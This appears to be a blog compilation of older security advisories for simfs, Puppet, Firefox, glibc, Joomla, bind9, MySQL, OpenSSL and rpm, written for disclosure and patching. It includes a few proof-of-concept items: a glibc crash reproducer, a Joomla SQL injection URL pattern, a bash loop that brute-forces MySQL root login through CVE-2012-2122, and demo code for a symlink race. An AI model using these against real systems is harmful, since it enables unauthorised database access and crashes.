
SimFS (VZ / OpenVZ) Security Vulnerability #PSBM-27641, #CVE-2014-3519

***UPDATE IMMEDIATELY – Vulnerability in simfs virtual filesystem***

A critical vulnerability in the legacy simfs Container filesystem was fixed. This affects OpenVZ and Parallels Virtuozzo Containers based on vzfs.

Note: ploop filesystems were not affected.

References:

http://www.webhostingtalk.com/showpo…0&postcount=38

https://openvz.org/Download/kernel/rhel6/042stab090.5

http://kb.parallels.com/en/122142

CVE-2013-4969: Puppet Vulnerability

Description

Puppet uses temp files unsafely by looking for a name it can use in a
directory, and then later writing to that file, creating a
vulnerability in which an attacker could make the name a symlink to
another file and thereby cause the puppet agent to overwrite something
that it did not intend to.
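To show the pattern the description above refers to, here is an added C example (written for this post, not Puppet's own code). It plays out the check-then-write sequence in a scratch directory under /tmp: the agent-like code checks that a name is free, a local user plants a symlink at that name pointing at another file inside the race window, and the later write either follows the link (plain O_CREAT|O_TRUNC, the unsafe form) or is refused (O_CREAT|O_EXCL|O_NOFOLLOW, the hardened form). The directory, file names and contents are constructed for the demonstration.

```c
#ifndef _GNU_SOURCE
#define _GNU_SOURCE
#endif
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

/* Step 1 of the unsafe pattern: "find a name I can use" (the check). */
static int name_is_free(const char *path) {
    struct stat st;
    return lstat(path, &st) == -1 && errno == ENOENT;
}

/* Step 2, unsafe: open the name later with O_TRUNC. If a symlink now sits at the
   name, the kernel follows it and the link target is truncated and overwritten. */
static int unsafe_write(const char *path, const char *data) {
    int fd = open(path, O_WRONLY | O_CREAT | O_TRUNC, 0600);
    if (fd == -1) return -1;
    ssize_t n = write(fd, data, strlen(data));
    close(fd);
    return n == (ssize_t)strlen(data) ? 0 : -1;
}

/* Step 2, hardened: O_EXCL makes creation atomic and fails with EEXIST if anything
   (file or symlink) now occupies the name; O_NOFOLLOW additionally refuses symlinks. */
static int safe_write(const char *path, const char *data) {
    int fd = open(path, O_WRONLY | O_CREAT | O_EXCL | O_NOFOLLOW, 0600);
    if (fd == -1) return -1;            /* EEXIST or ELOOP: the target is never touched */
    ssize_t n = write(fd, data, strlen(data));
    close(fd);
    return n == (ssize_t)strlen(data) ? 0 : -1;
}

static int write_file(const char *path, const char *data) {
    FILE *f = fopen(path, "w");
    if (!f) return -1;
    int ok = fputs(data, f) >= 0;
    return (fclose(f) == 0 && ok) ? 0 : -1;
}

static int read_file(const char *path, char *buf, size_t len) {
    FILE *f = fopen(path, "r");
    if (!f) return -1;
    size_t n = fread(buf, 1, len - 1, f);
    buf[n] = '\0';
    fclose(f);
    return 0;
}

/* Plays out the scenario in a fresh directory: the agent picks a free name, a local
   user plants a symlink at that name pointing at victim.conf, then the agent writes.
   Returns 1 if victim.conf was overwritten, 0 if it survived, -1 on setup failure. */
int victim_clobbered(int hardened) {
    char dir[] = "/tmp/symlink-race-XXXXXX";     /* constructed scratch directory */
    if (mkdtemp(dir) == NULL) return -1;
    char victim[64], tmpname[64], after[64] = "";
    snprintf(victim, sizeof victim, "%s/victim.conf", dir);
    snprintf(tmpname, sizeof tmpname, "%s/agent.tmp", dir);
    int result = -1;
    if (write_file(victim, "original\n") == 0 && name_is_free(tmpname)
        && symlink(victim, tmpname) == 0) {        /* the attacker's move, inside the race window */
        const char *out = "agent output\n";
        int wrc = hardened ? safe_write(tmpname, out) : unsafe_write(tmpname, out);
        (void)wrc;                                 /* -1 in the hardened case: write refused */
        read_file(victim, after, sizeof after);
        result = strcmp(after, "original\n") != 0;
    }
    unlink(tmpname);
    unlink(victim);
    rmdir(dir);
    return result;
}

int main(void) {
    printf("unsafe open:   victim overwritten = %d\n", victim_clobbered(0));
    printf("hardened open: victim overwritten = %d\n", victim_clobbered(1));
    return 0;
}
```

When the hardened open fails with EEXIST the right reaction is to choose a fresh name atomically (mkstemp creates and opens it in one step) rather than to retry the same name; the check-then-use gap is what the advisory describes, and no amount of re-checking closes it.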

References

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4969

http://www.ubuntu.com/usn/usn-2077-1

Several Vulnerabilities in Mozilla Firefox, Thunderbird, Seamonkey

Updated software packages for Mozilla Firefox, Thunderbird and SeaMonkey that fix several recently discovered security issues are now available for nearly all operating systems and platforms.

You should upgrade your software immediately!

Patched and Secure Versions
If you are not using one of the versions below, you are vulnerable.

Firefox 18.0
Firefox ESR 10.0.12
Firefox ESR 17.0.2
Thunderbird 17.0.2
Thunderbird ESR 10.0.12
Thunderbird ESR 17.0.2
SeaMonkey 2.15

Related MFSAs

MFSA 2013-20
Mis-issued TURKTRUST certificates

MFSA 2013-19
Use-after-free in Javascript Proxy objects

MFSA 2013-18
Use-after-free in Vibrate

MFSA 2013-17
Use-after-free in ListenerManager

MFSA 2013-16
Use-after-free in serializeToStream

MFSA 2013-15
Privilege escalation through plugin objects

MFSA 2013-14
Chrome Object Wrapper (COW) bypass through changing prototype

MFSA 2013-13
Memory corruption in XBL with XML bindings containing SVG

MFSA 2013-12
Buffer overflow in Javascript string concatenation

MFSA 2013-11
Address space layout leaked in XBL objects

MFSA 2013-10
Event manipulation in plugin handler to bypass same-origin policy

MFSA 2013-09
Compartment mismatch with quickstubs returned values

MFSA 2013-08
AutoWrapperChanger fails to keep objects alive during garbage collection

MFSA 2013-07
Crash due to handling of SSL on threads

MFSA 2013-05
Use-after-free when displaying table with many columns and column groups

MFSA 2013-04
URL spoofing in addressbar during page loads

MFSA 2013-03
Buffer Overflow in Canvas

MFSA 2013-02
Use-after-free and buffer overflow issues found using Address Sanitizer

MFSA 2013-01
Miscellaneous memory safety hazards (rv:18.0/ rv:10.0.12 / rv:17.0.2)

MFSA 2012-98
Firefox installer DLL hijacking

Related CVEs:

91811 – CVE-2013-0769 Mozilla: Miscellaneous memory safety hazards (rv:10.0.12) (MFSA 2013-01)
891821 – CVE-2013-0762 CVE-2013-0766 CVE-2013-0767 Mozilla: Use-after-free & buffer overflow w/Address Sanitizer (MFSA 2013-02)
891824 – CVE-2013-0759 Mozilla: URL spoofing in addressbar during page loads (MFSA 2013-04)
891825 – CVE-2013-0744 Mozilla: Use-after-free when displaying table with many columns and column groups (MFSA 2013-05)
892142 – CVE-2013-0746 Mozilla: Compartment mismatch with quickstubs returned values (MFSA 2013-09)
892144 – CVE-2013-0748 Mozilla: Address space layout leaked in XBL objects (MFSA 2013-11)
892145 – CVE-2013-0750 Mozilla: Buffer overflow in Javascript string concatenation (MFSA 2013-12)
892148 – CVE-2013-0758 Mozilla: Chrome Object Wrapper (COW) bypass through plugin objects (MFSA 2013-15)
892149 – CVE-2013-0753 Mozilla: Use-after-free in serializeToStream (MFSA 2013-16)
892150 – CVE-2013-0754 Mozilla: Use-after-free in ListenerManager (MFSA 2013-17)

References:
http://www.mozilla.org/security/known-vulnerabilities/firefoxESR.html
https://rhn.redhat.com/errata/RHSA-2013-0144.html
https://rhn.redhat.com/errata/RHSA-2013-0145.html

CVE-2012-3480: glibc overflow vulnerability

This issue affects the versions of the glibc package shipped with RHEL 5 and 6 and with Fedora 16 and 17.

Note: this was just reported and an official patch from RHEL is not yet available.

Vulnerability details

Multiple integer overflows, leading to stack-based buffer overflows, were found in various stdlib functions of GNU libc (strtod, strtof, strtold, strtod_l and related routines). If an application using the affected stdlib functions did not perform user-level sanitization of provided inputs, a local attacker could use this flaw to cause such an application to crash or, potentially, execute arbitrary code with the privileges of the user running the application.

* Upstream bug report:
[1] http://sourceware.org/bugzilla/show_bug.cgi?id=14459

* Upstream patch (might not be the final one):
[2] http://sourceware.org/ml/libc-alpha/2012-08/msg00202.html

* References:
[3] https://bugzilla.redhat.com/show_bug.cgi?id=847715

Sample reproducer from upstream bug

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* "1" followed by SIZE zeros and an exponent below INT_MIN; the exponent
   arithmetic inside strtod overflows on unpatched glibc. */
#define EXPONENT "e-2147483649"
#define SIZE 214748364

int
main (void)
{
  /* About 205 MB: the mantissa digits, the exponent and its NUL terminator. */
  char *p = malloc (1 + SIZE + sizeof (EXPONENT));
  if (p == NULL)
    {
      perror ("malloc");
      exit (EXIT_FAILURE);
    }
  p[0] = '1';
  memset (p + 1, '0', SIZE);
  memcpy (p + 1 + SIZE, EXPONENT, sizeof (EXPONENT)); /* copies the NUL too */
  double d = strtod (p, NULL);   /* crashes or corrupts the stack on affected versions */
  printf ("%a\n", d);
  exit (EXIT_SUCCESS);
}

Reference: http://www.openwall.com/lists/oss-security/2012/08/13/4

2 Joomla SQL Injection Vulnerabilities Discovered

Two SQL injection vulnerabilities were recently detected in the com_package and com_photo modules of the Joomla Content Management System. Remote attackers and low-privileged user accounts can inject and execute their own SQL commands to compromise the application database. In the com_package module the vulnerability is located in the bound id parameter. Successful exploitation results in compromise of the database (server) or of the application (web).

com_package vulnerability:

Vulnerable Module(s):

  • index.php?option=com_package

Vulnerable Parameter(s):

  • id

com_photo vulnerability:

Vulnerable Module(s):

  • index.php?option=com_photo

Vulnerable Parameter(s):

  • AlbumId
  • key

Patching and Mitigation:

  • These exploits are in the early stages of discovery, and as such no vendor patches or fixes have been released at the present time. Updates will be posted when a patch or new release is available.

Proof of Concept:

The SQL injection vulnerabilities can be exploited by remote attackers without a privileged user account or any required user interaction. For demonstration or to reproduce …

Path: /
File: index.php
Module: ?option=com_package
Parameter: details&id=-1'[SQL Injection]--
URL: http://www.xxx.com/index.php?option=com_package&task=details&id=174-1'[SQL Injection]--

References:

http://www.vulnerability-lab.com/get_content.php?id=652
http://www.vulnerability-lab.com/get_content.php?id=654

bind9 denial of service (remote) (CVE-2012-3817)

Package : bind9
Vulnerability : denial of service
Problem type : remote
Debian-specific: no
CVE ID : CVE-2012-3817

Einar Lonn discovered that under certain conditions bind9, a DNS server,
may use cached data before initialization. As a result, an attacker can
trigger an assertion failure on servers under high query load that do
DNSSEC validation.

We recommend that you upgrade your bind9 packages.

MySQL vulnerabilities up to 5.1.61, 5.2.11, 5.3.5, 5.5.22

On Saturday afternoon Sergei Golubchik posted to the oss-sec mailing list about a recently patched security flaw (CVE-2012-2122) in the MySQL and MariaDB database servers. This flaw was rooted in an assumption that the memcmp() function would always return a value within the range -127 to 127 (signed character). On some platforms and with certain optimizations enabled, this routine can return values outside of this range, eventually causing the code that compares a hashed password to sometimes return true even when the wrong password is specified. Since the authentication protocol generates a different hash each time this comparison is done, there is a 1 in 256 chance that ANY password would be accepted for authentication.

Proof of Concept

In short, if you try to authenticate to a MySQL server affected by this flaw, there is a chance it will accept your password even if the wrong one was supplied. The following one-liner in bash will provide access to an affected MySQL server as the root user account, without actually knowing the password.

$ for i in `seq 1 1000`; do mysql -u root --password=bad -h 127.0.0.1 2>/dev/null; done
mysql>

Vulnerability Outline

  • All MariaDB/MySQL versions up to 5.1.61, 5.2.11, 5.3.5, 5.5.22 are vulnerable.
  • MariaDB versions from 5.1.62, 5.2.12, 5.3.6, 5.5.23 are not.
  • MySQL versions from 5.1.63, 5.5.24, 5.6.6 are not.
  • This issue got assigned an id CVE-2012-2122.

Vulnerability Details

Here’s the issue. When a user connects to MariaDB/MySQL, a token (SHA
over a password and a random scramble string) is calculated and compared
with the expected value. Because of incorrect casting, it might’ve
happened that the token and the expected value were considered equal,
even if the memcmp() returned a non-zero value. In this case
MySQL/MariaDB would think that the password is correct, even while it is
not. Because the protocol uses random strings, the probability of
hitting this bug is about 1/256.

Which means, if one knows a user name to connect (and “root” almost
always exists), she can connect using *any* password by repeating
connection attempts. ~300 attempts take only a fraction of a second, so
basically account password protection is as good as nonexistent.
Any client will do, there’s no need for a special libmysqlclient library.

But practically it’s better than it looks – many MySQL/MariaDB builds
are not affected by this bug.

Whether a particular build of MySQL or MariaDB is vulnerable, depends on
how and where it was built. A prerequisite is a memcmp() that can return
an arbitrary integer (outside of -128..127 range). To my knowledge gcc
builtin memcmp is safe, BSD libc memcmp is safe. Linux glibc
sse-optimized memcmp is not safe, but gcc usually uses the inlined
builtin version.

Patch Details

The password.c source can be patched against this vulnerability by replacing line 534 with:

return test(memcmp(hash_stage2, hash_stage2_reassured, SHA1_HASH_SIZE));
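To make the narrowing concrete, here is an added C example (written for this post; not MySQL's or MariaDB's source). It keeps the names from the patch line above (hash_stage2, hash_stage2_reassured, SHA1_HASH_SIZE and MySQL's test() macro) and mirrors my_bool as a plain char, which is how MySQL defines it. Two memcmp models are constructed: one that only ever returns -1, 0 or 1, like the gcc builtin, and one that returns the raw 32-bit difference of the first differing word, standing in for an optimised implementation. A constructed sweep over hashes that differ from the stored one by 1..65536 in the first word counts how many wrong hashes each check accepts; with the wide memcmp the vulnerable check accepts 256 of 65536, the same 1/256 figure given in the post, while the patched check accepts none.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define SHA1_HASH_SIZE 20
typedef char my_bool;             /* MySQL's my_bool is a plain char: only 8 bits survive a return */
#define test(a) ((a) ? 1 : 0)     /* MySQL's test() macro, as used in the patched line */

typedef int (*cmp_fn)(const void *, const void *, size_t);

/* Model of a "safe" memcmp that only ever returns -1, 0 or 1 (e.g. the gcc builtin). */
int clamped_memcmp(const void *pa, const void *pb, size_t n) {
    const unsigned char *a = pa, *b = pb;
    for (size_t i = 0; i < n; i++)
        if (a[i] != b[i]) return a[i] < b[i] ? -1 : 1;
    return 0;
}

/* Constructed model of an optimised memcmp: compares four bytes at a time and returns
   the raw 32-bit difference of the first differing word, a value that need not lie
   in -128..127 (a valid memcmp only promises the sign, not the magnitude). */
int wide_memcmp(const void *pa, const void *pb, size_t n) {
    const unsigned char *a = pa, *b = pb;
    size_t i = 0;
    for (; i + 4 <= n; i += 4) {
        uint32_t wa, wb;
        memcpy(&wa, a + i, 4);
        memcpy(&wb, b + i, 4);
        if (wa != wb) return (int)(wa - wb);
    }
    for (; i < n; i++)
        if (a[i] != b[i]) return (int)a[i] - (int)b[i];
    return 0;
}

/* Vulnerable check_scramble(): the int from memcmp is narrowed to my_bool on return.
   0 means "password matches", so any memcmp result that is a multiple of 256 passes. */
my_bool check_scramble_vuln(const unsigned char *hash_stage2,
                            const unsigned char *hash_stage2_reassured, cmp_fn cmp) {
    return cmp(hash_stage2, hash_stage2_reassured, SHA1_HASH_SIZE);
}

/* Patched check_scramble(): test() collapses any non-zero result to 1 before narrowing. */
my_bool check_scramble_fixed(const unsigned char *hash_stage2,
                             const unsigned char *hash_stage2_reassured, cmp_fn cmp) {
    return test(cmp(hash_stage2, hash_stage2_reassured, SHA1_HASH_SIZE));
}

/* Counts how many wrong hashes are accepted when the supplied hash differs from the
   stored one by delta = 1..limit in its first 32-bit word (a constructed sweep, not the
   real protocol's random scrambles). fixed selects the patched or the vulnerable check. */
unsigned count_false_accepts(unsigned limit, cmp_fn cmp, int fixed) {
    unsigned char stored[SHA1_HASH_SIZE], supplied[SHA1_HASH_SIZE];
    for (int i = 0; i < SHA1_HASH_SIZE; i++)
        stored[i] = (unsigned char)(0x5a + i * 7);          /* constructed stored hash */
    unsigned accepted = 0;
    for (unsigned delta = 1; delta <= limit; delta++) {
        memcpy(supplied, stored, SHA1_HASH_SIZE);
        uint32_t w;
        memcpy(&w, supplied, 4);
        w += delta;                                          /* guaranteed wrong hash */
        memcpy(supplied, &w, 4);
        my_bool r = fixed ? check_scramble_fixed(stored, supplied, cmp)
                          : check_scramble_vuln(stored, supplied, cmp);
        if (r == 0) accepted++;
    }
    return accepted;
}

int main(void) {
    printf("clamped memcmp, vulnerable check: %u/65536 wrong hashes accepted\n",
           count_false_accepts(65536, clamped_memcmp, 0));
    printf("wide memcmp,    vulnerable check: %u/65536 wrong hashes accepted\n",
           count_false_accepts(65536, wide_memcmp, 0));
    printf("wide memcmp,    patched check:    %u/65536 wrong hashes accepted\n",
           count_false_accepts(65536, wide_memcmp, 1));
    return 0;
}
```

The sweep shows why the outcome depends on the build rather than on the MySQL version alone: the same check_scramble() is correct with a memcmp whose result fits in a char and wrong with one whose result does not, which is the distinction between the gcc builtin and the sse-optimized glibc routine drawn in the post.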

Vendor Patches

Please check with your current OS vendor to see if patched binaries are available for updating.


OpenSSL Still vulnerable, fix CVE-2012-2110 not sufficient!

It was discovered that the fix for CVE-2012-2110 released on 19 Apr 2012 and referenced in this post on unhackable was not sufficient to correct the issue for OpenSSL 0.9.8.

Please see http://www.openssl.org/news/secadv_20120419.txt for details of that vulnerability.

This issue only affects OpenSSL 0.9.8v. OpenSSL 1.0.1a and 1.0.0i already contain a patch sufficient to correct CVE-2012-2110.

Thanks to Red Hat for discovering and fixing this issue.

Affected users should upgrade to 0.9.8w.

OpenSSL Vulnerabilities – CVE-2012-2110, CVE-2006-7250, CVE-2012-1165

Summary:

An application using OpenSSL could be made to crash or run programs if it
opened a specially crafted file.

Software Description:
- openssl: Secure Socket Layer (SSL) cryptographic library and tools

Details:

It was discovered that OpenSSL could be made to dereference a NULL pointer
when processing S/MIME messages. A remote attacker could use this to cause
a denial of service. These issues did not affect Ubuntu 8.04 LTS.
(CVE-2006-7250, CVE-2012-1165)

Tavis Ormandy discovered that OpenSSL did not properly perform bounds
checking when processing DER data via BIO or FILE functions. A remote
attacker could trigger this flaw in services that used SSL to cause a
denial of service or possibly execute arbitrary code with application
privileges. (CVE-2012-2110)

[Security Update] Important Vulnerability found in rpm

Updated rpm packages that fix multiple security issues are now available for Red Hat Enterprise Linux 5 and 6; Red Hat Enterprise Linux 3 and 4 Extended Life Cycle Support; Red Hat Enterprise Linux 5.3 Long Life; and Red Hat Enterprise Linux 5.6, 6.0 and 6.1 Extended Update Support.

The Red Hat Security Response Team has rated this update as having important security impact. Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section.

The RPM Package Manager (RPM) is a command-line driven package management system capable of installing, uninstalling, verifying, querying, and updating software packages.

Multiple flaws were found in the way RPM parsed package file headers. An attacker could create a specially-crafted RPM package that, when its package header was accessed, or during package signature verification, could cause an application using the RPM library (such as the rpm command line tool, or the yum and up2date package managers) to crash or, potentially, execute arbitrary code. (CVE-2012-0060, CVE-2012-0061, CVE-2012-0815)

Note: Although an RPM package can, by design, execute arbitrary code when installed, this issue would allow a specially-crafted RPM package to execute arbitrary code before its digital signature has been verified. Package downloads from the Red Hat Network are protected by the use of a secure HTTPS connection in addition to the RPM package signature checks.

All RPM users should upgrade to these updated packages, which contain a backported patch to correct these issues. All running applications linked against the RPM library must be restarted for this update to take effect.